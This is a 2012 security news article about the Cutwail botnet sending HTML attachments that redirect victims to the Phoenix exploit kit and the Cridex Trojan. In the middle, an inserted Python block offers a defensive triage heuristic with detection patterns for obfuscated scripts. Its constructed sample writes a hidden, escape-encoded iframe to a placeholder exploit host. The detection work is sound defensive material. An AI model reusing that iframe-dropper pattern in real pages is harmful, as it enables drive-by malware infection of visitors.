Cutwail botnet intensifies spam spewing
Posted on 17.02.2012
The long-running Cutwail botnet is still alive and spamming from its roughly 1.5 million bots, and has lately been spotted sending malicious HTML attachments.

The spam emails range from fake forwarded Xerox scans and invoices from various companies to bogus suspended bank account notices.


Most mail clients do not render or open attached HTML documents automatically, so the recipient has to open the attachment themselves, at which point it is loaded in the default browser.

"The first half of the HTML code is the benign part," explain M86 Security researchers. "It provides the 'You are redirecting…' text in the browser title bar and prints 'Please wait… Loading...' in the browser – the cybercriminal perhaps just being courteous. The second and malicious part is the script tag where the obfuscated JavaScript resides. The JavaScript writes an iframe that loads a webpage in the same browser window."

The page in question hosts the Phoenix exploit kit, which probes the visiting browser and its plugins for a number of known vulnerabilities and, if one can be exploited, downloads and installs malware; in this particular case, the data-stealing Cridex Trojan.
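The attachment structure described above (a reassuring title and "Please wait" text, followed by an obfuscated script that writes an iframe into the page) is a pattern a mail gateway can triage statically. The following is an added example, not code from M86 Security or from this article: a small Python heuristic that parses an HTML attachment, separates visible text from script bodies, and scores the indicators the researchers describe (redirect/loading lure with almost no content, `unescape`/`eval`/`fromCharCode`/`document.write`, an iframe hidden inside an encoded string). Both sample attachments are constructed for the example, the hostname `exploit.example.invalid` is a placeholder, and the indicator weights and the verdict thresholds are assumptions to be tuned against real traffic.

```python
"""Static triage of HTML e-mail attachments for the redirect-lure / iframe-dropper pattern.

Added example; sample attachments are constructed, not captured spam.
"""
import re
from html.parser import HTMLParser

# Script-level indicators; each hit adds one point (weights are assumptions).
OBFUSCATION_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode"),
    "document.write": re.compile(r"document\.write(ln)?\s*\("),
    # '<iframe' encoded as %3C / \x3c / \u003c so it survives inspection of the raw HTML
    "iframe-in-string": re.compile(r"(%3C|\\x3c|\\u003c|<)\s*iframe", re.I),
    # long runs of escaped bytes typical of escape()/fromCharCode payloads
    "escaped-bytes": re.compile(r"(?:%[0-9a-f]{2}|\\x[0-9a-f]{2}|\\u[0-9a-f]{4}){8,}", re.I),
}
# Phrases from the "courteous" cover text the attachment shows while the script runs.
LURE_PHRASES = ("redirecting", "please wait", "loading")


class AttachmentParser(HTMLParser):
    """Collect title, visible text, raw <script> bodies and static <iframe> tags."""

    def __init__(self):
        super().__init__()
        self.title, self.text, self.scripts, self.iframes = "", [], [], []
        self._in_title = self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")
        elif tag == "iframe":
            self.iframes.append(dict(attrs))

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> contents over as raw data, so no HTML decoding happens here.
        if self._in_title:
            self.title += data
        elif self._in_script:
            self.scripts[-1] += data
        else:
            self.text.append(data)


def triage(html: str) -> dict:
    """Return score, verdict and the reasons behind it for one HTML attachment."""
    p = AttachmentParser()
    p.feed(html)
    p.close()
    score, reasons = 0, []
    visible_words = " ".join(p.text).split()
    cover = (p.title + " " + " ".join(visible_words)).lower()
    # Lure: redirect/loading wording and fewer than 20 visible words (threshold is an assumption).
    if any(phrase in cover for phrase in LURE_PHRASES) and len(visible_words) < 20:
        score += 2
        reasons.append("redirect/loading lure with almost no real content")
    for body in p.scripts:
        for name, rx in OBFUSCATION_PATTERNS.items():
            if rx.search(body):
                score += 1
                reasons.append(f"script indicator: {name}")
    if p.iframes:
        score += 1
        reasons.append("static iframe present")
    verdict = "malicious" if score >= 4 else "suspicious" if score >= 2 else "clean"
    return {"score": score, "verdict": verdict, "reasons": reasons, "scripts": len(p.scripts)}


# Constructed sample modelled on the structure M86 describes (not the real attachment):
# benign title/cover text, then a script that document.write()s an escape()-encoded iframe.
LURE_SAMPLE = """<html><head><title>You are redirecting...</title></head>
<body>Please wait... Loading...
<script type="text/javascript">
var p = "%3Ciframe%20src%3D%22http%3A%2F%2Fexploit.example.invalid%2Fin.php%22%20width%3D1%20height%3D1%3E%3C%2Fiframe%3E";
document.write(unescape(p));
</script></body></html>"""

# Constructed benign attachment: a plain scan notification with no script at all.
CLEAN_SAMPLE = """<html><head><title>Scanned document</title></head>
<body><p>Attached is the scan from the Xerox WorkCentre in the front office.
Pages: 2. Resolution: 300 dpi. Please file with this month's invoices.</p>
</body></html>"""

if __name__ == "__main__":
    for label, sample in (("lure", LURE_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, triage(sample))
```

The lure sample scores 5 (lure text, `unescape`, `document.write`, encoded `iframe`) and is classed as malicious, while the scan notice scores 0. The point of scoring rather than matching a single string is that the quote above already notes campaigns are recycled with "different twists": the cover text changes, the encoding changes, but the combination of almost no visible content plus a script that decodes and writes markup stays recognisable.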

The researchers also managed to get a peek at the server's "Phoenix Exploit's Kit" admin page, which indicated that some 15 percent of the visitors who reached the exploit page via the malicious HTML attachments were successfully compromised.

"Spammers tend to recycle spam campaign themes, sometimes adding different twists. So we expect more of these types of HTML attachment campaigns to come in the future," they concluded with a warning.

I would also add: make sure your browser and its plugins are always up to date, along with any other widely installed software that is frequently patched, since that is exactly what exploit kits such as Phoenix target.

Copyright 1998-2014 by Help Net Security.